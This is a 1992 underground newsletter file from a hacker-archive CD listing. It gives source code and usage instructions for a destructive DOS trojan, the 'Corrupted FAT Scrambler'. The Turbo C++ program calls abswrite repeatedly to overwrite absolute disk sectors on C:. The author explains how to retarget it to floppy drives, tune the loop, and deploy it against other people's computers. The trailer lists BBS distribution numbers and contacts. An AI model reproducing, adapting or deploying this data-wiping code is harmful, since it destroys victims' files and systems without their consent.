home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / pc / virus / vas074.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  4.8 KB  |  93 lines

  1.  
  2. ╔═════════════════════════════════════════════════════════════════════════════╗
  3. ║ ─────────────────────── ▀▄     █ █▀▀▀█ █▀▀▀▀ ────────────────────────────── ║
  4. ║ ───────────────────────── ▀▄   █ █   █ █▄▄▄▄ ────────────────────────────── ║
  5. ║ ─────────────────────────── ▀▄ █ █▀▀▀█     █ ────────────────────────────── ║
  6. ║ ───────────────────────────── ▀█ █   █ ▄▄▄▄█ ────────────────────────────── ║
  7. ╠═════════════════════════════════════════════════════════════════════════════╣
  8. ║                Vaginal and Anal Secretions Newsletter #0074                 ║
  9. ╟─────────────────────────────────────────────────────────────────────────────╢
  10. ║          Date Released : [08/05/92]       Author: CorrupTor -CTD-           ║
  11. ╟─────────────────────────────────────────────────────────────────────────────╢
  12. ║                     The Corrupted FAT Scrambler Trojan                      ║
  13. ╙─────────────────────────────────────────────────────────────────────────────╜
  14.  
  15.      This is one of my shortest & simple trojans, therefore you should be
  16.    able to understand how it works.  It's called the Corrupted Fat Scrambler
  17.    1.0.  First of all, I'm not responsible for destruction of your computer
  18.    data or anyone elses..  I only promote this on NaZi-PiG/Punk-Bastard's
  19.    Computers...
  20.  
  21.      Okay, First of all, Make sure you have a copy of Borland's Turbo C++.
  22.    This Trojan was compiled in Turbo C++ v1.01!!!!!!! Jesus!  It should
  23.    work on any newer versions of Turbo C++.
  24.  
  25.      I have put REM statements out beside each command to tell you what
  26.    the fuck it does incase you still don't understand what it does.
  27.  
  28.  
  29. -----------------------------------------------------------------------------
  30.  
  31. { Corrupted Fat Scrambler }
  32.  
  33. #include <stdlib.h>        { Duh, Include Filez }
  34. #include <stdio.h>
  35. #include <conio.h>
  36. #include <process.h>
  37. #include <dos.h>
  38. #include <time.h>
  39. main()                    { Start of Main Program }
  40. {
  41.    int i;                 { sets up a variable, Duh }
  42.    clrscr();              { Clears Screen }
  43.    randomize();           { Sets up thing so I can randomize the i Var. }
  44.    for(i=0;i<666;i++)     { Defines loop of 666 }
  45.    abswrite(2, i, i, 0);  { Readz & Writez Absolute Sectors Randomly! on C: }
  46. printf("Get PHuCKED!");   { Text Displayed to NaZi-PiG }
  47. return(0);                { Returns 0 Value }
  48. }
  49.  
  50. -----------------------------------------------------------------------------
  51.  
  52.     Okay, What it does is picks a random sector to start writing Shit, and
  53.   a ramdom number of sectors to write!  If you want to shorten the number
  54.   of timez it loops just change the 666 to like 100.. Since 666 will take
  55.   a long time to finish.  You can also try this Monster out on a Floppy
  56.   drive. Change the 2 in the Abswrite command to '0' for A:, and '1' for B:
  57.  
  58.     Go ahead, try it out.  You'll be very pleased with its results! Throw
  59.   some shit on the old floppy drive, and run the trojan to do A: or B:
  60.   When you are done go the A:, look at it, then do chkdsk /F, and check
  61.   it out! If you really wanna be thrilled, Make a directory after that!
  62.   It really Phucks your Floppy up! Of course you can reformat it... Duh!
  63.  
  64.  
  65.     This Text has been created and brought to you by Corruptor.
  66.  
  67.                         Call The Underworld Legacy
  68.                - SuiCiDaL SynDRoME, P.i.N. Node #2 -
  69.                    - TOXiC AVD HQ! / CTD HQ! -
  70.                       717.566.575o
  71.                       NUP:NOLAMERS
  72.  
  73.                    ───═════[ VaS DiSTRiBuTioN SiTeS ]═════───
  74. ╔═════════════════════════════════════════════════════════════════════════════╗
  75. ║  BBS Name                 Number       Baud   Sysop                Title    ║
  76. ╟─────────────────────────────────────────────────────────────────────────────╢
  77. ║  LiVe WiRE BBS        (313)464-1470    14.4   Studmuffin          World HQ  ║
  78. ║  Floating Pancreas    (305)551-0311    14.4   Majestic Cockster   Dist. #1  ║
  79. ║  Midian BBS           (703)790-8048    14.4   The Raging Golemn   Dist. #2  ║
  80. ║  CHaoTiC BeHaVioR     (717)652-7096    16.8   Chaos               Dist. #3  ║
  81. ╟─────────────────────────────────────────────────────────────────────────────╢
  82. ║       VaS Voice Mail Box ... (313) 910-3030 ... Toll Free In Michigan!      ║
  83. ╟─────────────────────────────────────────────────────────────────────────────╢
  84. ║   Studmuffin can be reached via internet at the address: dmitchel@ais.org   ║
  85. ╟─────────────────────────────────────────────────────────────────────────────╢
  86. ║              And To Reach us Via U.S. Mail, Send Letters To:                ║
  87. ║                           VaS World Headquarters                            ║
  88. ║                              P.O. Box  530768                               ║
  89. ║                              Livonia,MI 48153                               ║
  90. ╚═════════════════════════════════════════════════════════════════════════════╝
  91.  
  92.  
  93.